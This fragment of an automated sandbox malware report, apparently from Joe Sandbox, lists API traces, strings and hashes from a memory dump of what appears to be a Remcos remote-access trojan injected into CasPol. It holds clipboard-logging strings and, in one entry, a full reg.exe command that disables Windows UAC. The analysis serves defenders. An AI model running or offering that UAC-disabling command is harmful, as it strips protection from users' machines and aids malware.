                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                            • String ID:
                                                                                            • API String ID: 493672254-0
                                                                                            • Opcode ID: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                            • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                                            • Opcode Fuzzy Hash: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                            • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                                                            • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                            • String ID:
                                                                                            • API String ID: 3852720340-0
                                                                                            • Opcode ID: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                                                            • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                                                            • Opcode Fuzzy Hash: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                                                            • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                            • _free.LIBCMT ref: 00446EF6
                                                                                            • _free.LIBCMT ref: 00446F1E
                                                                                            • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                            • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                            • _abort.LIBCMT ref: 00446F3D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                            • String ID:
                                                                                            • API String ID: 3160817290-0
                                                                                            • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                            • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                                                            • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                            • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                                                            APIs
                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                            • String ID:
                                                                                            • API String ID: 221034970-0
                                                                                            • Opcode ID: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
                                                                                            • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                                                            • Opcode Fuzzy Hash: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
                                                                                            • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                                                            APIs
                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                                                            • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                            • String ID:
                                                                                            • API String ID: 221034970-0
                                                                                            • Opcode ID: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                                            • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                                                            • Opcode Fuzzy Hash: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                                            • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                                                            APIs
                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                                                            • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                            • String ID:
                                                                                            • API String ID: 221034970-0
                                                                                            • Opcode ID: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                                            • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                                                            • Opcode Fuzzy Hash: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                                            • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                                                            APIs
                                                                                            • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Enum$InfoQueryValue
                                                                                            • String ID: [regsplt]$DG
                                                                                            • API String ID: 3554306468-1089238109
                                                                                            • Opcode ID: c127d2cf9b5c89c260adb81f554e6abb521613c945a79df49cd6ee466864448d
                                                                                            • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                                                            • Opcode Fuzzy Hash: c127d2cf9b5c89c260adb81f554e6abb521613c945a79df49cd6ee466864448d
                                                                                            • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                            APIs
                                                                                              • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                              • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                              • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                            • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                              • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                              • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                            • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                                                            • API String ID: 2974294136-753205382
                                                                                            • Opcode ID: 04bb198fbbe4769673077618b9268d4d887794de53c6d81a72813602c084add1
                                                                                            • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                                                            • Opcode Fuzzy Hash: 04bb198fbbe4769673077618b9268d4d887794de53c6d81a72813602c084add1
                                                                                            • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                                                            APIs
                                                                                            • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                            • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                            • GetLastError.KERNEL32 ref: 0041CA91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ClassCreateErrorLastRegisterWindow
                                                                                            • String ID: 0$MsgWindowClass
                                                                                            • API String ID: 2877667751-2410386613
                                                                                            • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                            • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                                            • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                            • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                            • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                            • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                            Strings
                                                                                            • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                            • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandle$CreateProcess
                                                                                            • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                            • API String ID: 2922976086-4183131282
                                                                                            • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                            • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                                                            • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                            • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                                                            APIs
                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002), ref: 004425F9
                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044262F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                            • API String ID: 4061214504-1276376045
                                                                                            • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                            • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                                                            • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                            • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                                                            APIs
                                                                                            • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                                                            • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                                                            • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseCreateValue
                                                                                            • String ID: pth_unenc$BG
                                                                                            • API String ID: 1818849710-2233081382
                                                                                            • Opcode ID: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                            • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                            • Opcode Fuzzy Hash: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                            • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                            APIs
                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AED
                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404AF9
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B04
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B0D
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                            • String ID: KeepAlive | Disabled
                                                                                            • API String ID: 2993684571-305739064
                                                                                            • Opcode ID: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                                            • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                                                            • Opcode Fuzzy Hash: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                                            • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                                                            APIs
                                                                                            • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                                                            • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                                                            • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                                                            • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                                                            Strings
                                                                                            • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                            • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                            • API String ID: 3024135584-2418719853
                                                                                            • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                            • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                                            • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                            • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: GetCursorInfo$User32.dll$`Wu
                                                                                            • API String ID: 1646373207-4024354691
                                                                                            • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                            • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                                                            • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                            • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                                                            • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                                                            • Opcode Fuzzy Hash: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                                                            • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                                                            APIs
                                                                                              • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                            • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                            • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                            • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                            • String ID:
                                                                                            • API String ID: 3525466593-0
                                                                                            • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                            • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                                                            • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                            • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                                                            APIs
                                                                                              • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                              • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                            • String ID:
                                                                                            • API String ID: 4269425633-0
                                                                                            • Opcode ID: b947fa994ad0dc43cc2d27d074a9b476dadf369fbeb33aa08de4f1a1173b1a3f
                                                                                            • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                                                            • Opcode Fuzzy Hash: b947fa994ad0dc43cc2d27d074a9b476dadf369fbeb33aa08de4f1a1173b1a3f
                                                                                            • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free
                                                                                            • String ID:
                                                                                            • API String ID: 269201875-0
                                                                                            • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                            • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                                                            • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                            • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3ED,?,00000000,?,00000001,?,?,00000001,0043E3ED,?), ref: 0044FF20
                                                                                            • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFA9
                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399BF,?), ref: 0044FFBB
                                                                                            • __freea.LIBCMT ref: 0044FFC4
                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                            • String ID:
